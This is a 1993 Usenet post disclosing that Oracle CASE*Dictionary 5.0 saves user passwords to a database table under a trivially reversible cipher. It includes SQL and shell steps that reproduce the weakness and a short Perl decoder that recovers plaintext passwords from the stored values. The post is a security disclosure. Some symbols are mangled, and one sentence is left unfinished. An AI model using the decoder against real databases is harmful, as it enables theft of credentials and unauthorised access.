Oracle CASE saves passwords to DB [security]
Date: 15 Sep 93 11:17:35 GMT
Message-ID: <ahe.748091855_at_th.tele.fi>
Howdy,
Try this to check whether your version of CASE contains this feature:
$ casedict -ins
CASE*Dictionary (TM): Version 5.0.22.6.0 - Production on Wed Sep 15 15:19:42 1993
Copyright (c) Oracle Corporation 1979, 1992. All rights reserved.
Usage: casedict -ins name/passwd report
set heading off feedback off
column mu_id format a40
grant connect to arkki identified by CASE;
!casedict -ins arkki/CASE myreport >/dev/null
select 'CASE',mu_id from sdd_menu where mu_block='myreport';
grant connect to arkki identified by dIcTioNarY;
!casedict -ins arkki/dIcTioNarY myreport >/dev/null
select 'dIcTioNarY',mu_id from sdd_menu where mu_block='myreport';
grant connect to arkki identified by STINKS;
!casedict -ins arkki/STINKS myreport >/dev/null
select 'STINKS',mu_id from sdd_menu where mu_block='myreport';
Here is the shortened output of the script:
CASE [g`\g/=0O_at_
dIcTioNarY [g`\g/^8_OcdCRpY
STINKS [g`\g/MCEIEH
#!/usr/bin/perl # CASE password decoder, Allu Helenius 1993 # - see how easy it is
_at_key=split(//,";662?A;0=<");
push(_at_key,_at_key,_at_key,_at_key); # enough..
while (<>) {
chop; _at_c = split(//); _at_p=(); for ($i=0; $i<_at_c; $i++) { push(_at_p,pack("C",ord(@c[$i])+ord("A")-ord(@key[$i]))); } print _at_p,"\n";
}
Here are the passwords above opened:
$ ./crackcasepass
[g`\g/=0O_at_ arkki/CASE [g`\g/^8_OcdCRpY arkki/dIcTioNarY [g`\g/MCEIEH arkki/STINKS
Oh, one more thing. Casedict's usage says there's an option:
Happy computing,
Allu
-- Allu Helenius, Telecom Finland The platform Oracle works best is 35mm slide projector.Received on Wed Sep 15 1993 - 13:17:35 CEST